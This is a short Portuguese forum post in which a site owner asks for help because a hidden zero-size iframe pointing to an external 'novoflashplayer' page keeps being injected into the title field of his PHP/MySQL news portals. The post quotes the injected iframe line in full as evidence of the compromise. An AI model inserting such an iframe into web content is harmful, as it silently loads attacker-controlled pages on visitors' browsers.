Gabriel Vince

Olá, Gostaria de apontar um erro, e gostaria de saber se alguém tem um problema similar Sempre que eu coloco uma noticia (via PHP e MYSQL) nos portais que tenho hospedado, momentos depois, é incluído no campo "titulo" da notícia o seguinte comando "<iframe src=http://www.novoflashplayer.com/auto.html height=0 width=0 scrolling=no frameborder=0></iframe>" alguém está invadindo o banco de dados e inserindo isso antes do título ou depois ... Gostaria de saber o que vocês fariam com essa falha de segurança... Considerando que Já tentei trocar a senha de todos os bancos de dados dos portais, porém o problema permanece...